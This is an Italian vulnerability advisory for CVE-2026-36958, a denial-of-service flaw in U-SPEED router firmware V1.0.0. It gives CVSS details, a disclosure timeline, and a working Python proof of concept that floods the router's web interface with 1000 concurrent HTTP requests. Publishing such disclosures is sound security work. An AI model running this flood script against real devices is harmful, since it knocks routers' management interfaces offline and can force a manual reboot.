
Proof-of-concept per CVE-2026-36958, una vulnerabilità denial-of-service nel firmware del router U-SPEED che esaurisce le risorse tramite richieste HTTP concorrenti, rendendo l'interfaccia web non reattiva.
CVE ID: CVE-2026-36958 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: U-SPEED Prodotto: Router U-SPEED Versione Firmware: V1.0.0 CWE: CWE-400 - Consumo di Risorse Non Controllato
Il firmware V1.0.0 del Router U-SPEED è vulnerabile a Denial of Service. Inviando un gran numero di richieste HTTP concorrenti a endpoint casuali o inesistenti sull'interfaccia di gestione web, un attaccante può esaurire le risorse di sistema nel server HTTP Boa integrato. Ciò rende l'interfaccia web del router non reattiva e potrebbe richiedere un riavvio manuale per ripristinare il normale funzionamento.
Punteggio CVSS v3.1: 7.5 (Alto)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Metrica | Valore |
|---|
| Vettore di Attacco | Rete |
| Complessità dell'Attacco | Bassa |
| Privilegi Richiesti | Nessuno |
| Interazione dell'Utente | Nessuna |
| Impatto sulla Riservatezza | Nessuno |
| Impatto sull'Integrità | Nessuno |
| Impatto sulla Disponibilità | Alto |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
Comportamento Atteso: Il server dovrebbe gestire le connessioni concorrenti in modo elegante. Comportamento Effettivo: L'interfaccia web diventa non reattiva; è richiesto un riavvio manuale.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilità scoperta |
| 2026-04-29 | Segnalata a MITRE |
| 2026-04-29 | CVE-2026-36958 assegnato |
| 2026-04-29 | Divulgazione pubblica |